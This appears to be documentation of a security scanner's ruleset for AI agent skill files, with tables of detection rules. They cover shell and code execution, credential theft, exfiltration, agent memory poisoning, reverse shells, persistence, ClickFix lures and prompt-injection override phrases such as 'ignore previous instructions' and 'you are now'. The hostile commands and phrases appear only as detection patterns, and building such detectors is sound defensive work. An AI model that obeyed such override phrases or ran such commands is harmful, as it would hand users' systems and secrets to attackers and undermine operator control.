Scanner Ruleset
v2026.03.01 Superseded March 2026 Major expansion adding 15 new detection categories aligned to the OWASP Agentic AI Threat Taxonomy. Introduces A–F safety scoring, base64 deep-scan, Unicode obfuscation detection, and CI-friendly --check and --ignore flags.
Code Execution
Dangerous runtime function calls that can execute arbitrary code or spawn external shell processes. Python rules use AST parsing to catch obfuscated aliases; JS/TS rules skip commented lines to reduce false positives.
| Rule ID | Severity | What it detects |
|---|---|---|
py_eval | high | eval() — executes arbitrary Python code |
py_exec | high | exec() — executes arbitrary Python code |
py_compile | medium | compile() — compiles arbitrary source to a code object |
py_dunder_import | high | __import__() — dynamic module import bypassing normal resolution |
py_importlib | high | importlib.import_module() — dynamic import at runtime |
py_os_system | high | os.system() — executes shell command via C system() |
py_os_popen | high | os.popen() — opens a pipe to a shell command |
py_subprocess_call | high | subprocess.call() — executes external command |
py_subprocess_run | high | subprocess.run() — executes external command |
py_subprocess_popen | high | subprocess.Popen() — spawns external process |
py_subprocess_check_output | high | subprocess.check_output() — executes command and returns output |
py_subprocess_check_call | high | subprocess.check_call() — executes command, raises on error |
py_subprocess_getoutput | high | subprocess.getoutput() — runs command in shell, returns stdout+stderr |
py_subprocess_getstatusoutput | high | subprocess.getstatusoutput() — runs command, returns (status, output) |
js_eval | high | eval() — executes arbitrary JS at runtime |
js_function_constructor | high | new Function() — constructs callable from arbitrary string |
js_child_process | high | require('child_process') — enables shell command execution |
js_exec_sync | high | execSync() / execFileSync() — synchronous shell execution |
js_spawn_sync | high | spawnSync() — synchronous child process spawn |
js_child_process_import | high | import … from 'child_process' — ESM shell command access |
js_fs_import | medium | import … from 'fs' — ESM filesystem access |
Hardcoded Credentials
Hardcoded secrets, API keys, and authentication tokens embedded in source code or configuration files. Matched context is automatically redacted in scan reports before upload.
| Rule ID | Severity | What it detects |
|---|---|---|
aws_access_key | critical | AWS Access Key ID — AKIA[0-9A-Z]{16} |
private_key | critical | PEM private key — -----BEGIN … PRIVATE KEY----- |
github_token | critical | GitHub token — gh[pousr]_[A-Za-z0-9_]{36,} |
slack_token | high | Slack token — xox[bpars]-[0-9a-zA-Z-]{10,} |
generic_secret | high | Generic credential pattern — api_key=, secret_key=, access_token=, auth_token=, password= with ≥16-char value in quotes |
Data Exfiltration
NewOutbound HTTP requests targeting known data collection, webhook relay, and exfiltration services. These services are frequently abused to receive stolen credentials or file contents.
| Rule ID | Severity | What it detects |
|---|---|---|
shell_exfil_service | high | curl/wget to ngrok.io, requestbin.com, webhook.site, pipedream.net, canarytokens, or Burp Collaborator |
Agent Memory Poisoning
NewShell operations that write to AI agent memory and instruction files. A poisoned MEMORY.md or CLAUDE.md can persistently redirect agent behavior across sessions.
| Rule ID | Severity | What it detects |
|---|---|---|
agent_memory_write | high | Shell redirect > to MEMORY.md, SOUL.md, CLAUDE.md, or .cursorrules |
agent_memory_inject | high | echo … >> MEMORY.md / SOUL.md / CLAUDE.md (append injection) |
Encoded Malware
Newbase64-encoded payloads designed to evade static analysis. The pattern-level rules catch explicit decode-and-execute pipelines; the deep-scan pass decodes every base64 blob ≥40 characters and re-applies all detection rules to the decoded content.
| Rule ID | Severity | What it detects |
|---|---|---|
b64_decode_exec | critical | … | base64 -d | bash / sh / python / perl / ruby |
b64_file_exec | critical | base64 -d <file> | bash / sh |
b64_encoded_payload | critical | Deep-scan: decoded blob contains curl|bash, /dev/tcp/, rm -rf /, wget|bash, Python socket import, or netcat -e |
Privilege Escalation
NewOperations that escalate a process to root or switch the active user context to a privileged account.
| Rule ID | Severity | What it detects |
|---|---|---|
priv_escalation_sudo | high | sudo su · sudo bash · sudo sh · sudo -s · sudo -i |
priv_setuid_root | critical | setuid(0) or seteuid(0) — sets process UID to root |
Persistence
NewMechanisms that survive reboots or new login sessions by registering with OS schedulers, init systems, or shell startup scripts.
| Rule ID | Severity | What it detects |
|---|---|---|
persistence_cron | high | crontab -e / crontab -l · @reboot · /etc/cron.* |
persistence_launchd | high | ~/Library/LaunchAgents · /Library/LaunchAgents · ~/Library/LaunchDaemons · /Library/LaunchDaemons |
persistence_systemd | high | systemctl enable … · /etc/systemd/system/*.service |
persistence_shell_profile | medium | echo … >> ~/.bashrc / .zshrc / .bash_profile / .profile / .bash_login / .zprofile |
Reverse Shell
NewNetwork callbacks that open an interactive shell connection from the target machine back to an attacker-controlled host.
| Rule ID | Severity | What it detects |
|---|---|---|
reverse_shell_devtcp | critical | /dev/tcp/<ip>/<port> or /dev/udp/<ip>/<port> — bash built-in TCP/UDP socket |
reverse_shell_netcat | critical | nc / ncat / netcat with -e, -E, -c, -C, -l, or -L flag |
reverse_shell_socat | critical | socat … EXEC … TCP — socat relayed shell |
reverse_shell_bash | critical | bash -i or -I with >& /dev/tcp redirect |
Unicode Obfuscation
NewInvisible or visually confusable Unicode characters used to hide malicious content from code reviewers while still being executed or interpreted by the runtime.
| Rule ID | Severity | What it detects |
|---|---|---|
unicode_zero_width | high | Zero-width space / joiner / non-joiner / word-joiner / BOM — U+200B, U+200C, U+200D, U+2060, U+FEFF |
unicode_cyrillic_mix | high | Cyrillic character adjacent to Latin letter — IDN homograph attack (e.g. аpple where а is Cyrillic U+0430) |
ClickFix Social Engineering
NewInstruction patterns that trick users into manually executing malicious commands by framing them as necessary troubleshooting or setup steps. Named after the ClickFix attack campaign.
| Rule ID | Severity | What it detects |
|---|---|---|
clickfix_terminal | high | "Open terminal and paste…" / "Launch terminal and run/type/execute…" |
clickfix_copy_paste | high | "Copy/paste this command/code/script into your terminal/console/command prompt" |
clickfix_run_dialog | high | "Press Win+R and…" — Windows Run dialog social engineering |
Dangerous File Operations
NewIrreversible destructive operations that can wipe filesystems or overwrite raw block devices.
| Rule ID | Severity | What it detects |
|---|---|---|
dangerous_rm_root | critical | rm -rf / · rm -rf ~ · rm -rf $HOME — recursive delete of root or home |
dangerous_dd_device | critical | dd of=/dev/sd* · /dev/hd* · /dev/nvme* · /dev/xvd* · /dev/vd* — raw block device overwrite |
Reconnaissance
NewNetwork scanning tools and cloud instance metadata endpoints used to map infrastructure before a targeted attack.
| Rule ID | Severity | What it detects |
|---|---|---|
recon_portscan | high | nmap · masscan · arp-scan · zmap · unicornscan |
cloud_metadata_imds | critical | 169.254.169.254 — AWS, Azure, and GCP instance metadata service |
cloud_metadata_gcp | critical | metadata.google.internal — GCP metadata server |
cloud_metadata_alibaba | high | 100.100.100.200 — Alibaba Cloud metadata endpoint |
Prompt Injection
Instruction override patterns embedded in Markdown or configuration that attempt to hijack AI agent behavior by superseding the system prompt.
| Rule ID | Severity | What it detects |
|---|---|---|
prompt_ignore_instructions | high | "ignore previous/prior/above instructions" |
prompt_role_hijack | high | "you are now …" — role reassignment injection |
prompt_system_prompt | medium | "system prompt" — system prompt reference |
prompt_disregard | high | "disregard previous/prior instructions" |
prompt_new_instructions | high | "new instructions:" — instruction block injection |
prompt_override | high | "override previous/prior instructions" |
prompt_forget | high | "forget everything/all/previous" |
prompt_do_not_follow | high | "do not follow the previous/above instructions" |
Bundled Binaries
NewExecutable or native library files bundled inside a skill archive. Skills should contain only text-based instructions and scripts — precompiled binaries cannot be meaningfully reviewed by static analysis.
| Rule ID | Severity | What it detects |
|---|---|---|
binary_file_bundled | high | .exe · .dll · .so · .dylib · .bin · .elf · .o · .a · .ko · .sys · .drv · .deb · .rpm · .msi · .pkg · .pyc · .pyo · .pyd |
Credential File Access
NewReads or directory searches targeting well-known credential storage locations on the host filesystem.
| Rule ID | Severity | What it detects |
|---|---|---|
cred_read_aws | critical | cat/read/open ~/.aws/credentials |
cred_read_docker | critical | cat/read/open ~/.docker/config.json — may contain registry authentication tokens |
cred_find_dirs | high | find … .ssh / .aws / .gnupg / .config/gcloud — searching credential directories |
Cryptocurrency Targeting
NewReferences to cryptocurrency wallet recovery material or wallet application data directories. Inspired by the ClawHavoc campaign (January 2026) where 341 malicious skills stole wallet seed phrases.
| Rule ID | Severity | What it detects |
|---|---|---|
crypto_seed_phrase | critical | "seed phrase" / "mnemonic phrase" / "secret recovery phrase" / "wallet recovery phrase" |
crypto_wallet_software | high | MetaMask · Phantom · Exodus · Electrum · Wasabi · Trezor · Ledger + wallet/keystore/password/seed keyword |
crypto_wallet_dir | high | ~/.ethereum · ~/.bitcoin · ~/.monero · ~/.litecoin · ~/.dogecoin · ~/Library/Ethereum · ~/Library/Bitcoin |
Path Traversal
NewDirectory traversal patterns and direct reads of sensitive system files. Also covers writes to git hooks, which can persist malicious code across every future commit or merge.
| Rule ID | Severity | What it detects |
|---|---|---|
path_traversal_sys | high | ../../etc · ../../root · ../../usr traversal patterns (2+ levels up targeting system dirs) |
sensitive_sys_read | critical | cat/head/tail /etc/passwd · /etc/shadow · /etc/sudoers · /etc/hosts |
git_hook_persist | medium | .git/hooks/pre-commit · post-commit · post-merge · pre-push · post-receive — possible persistence via git hooks |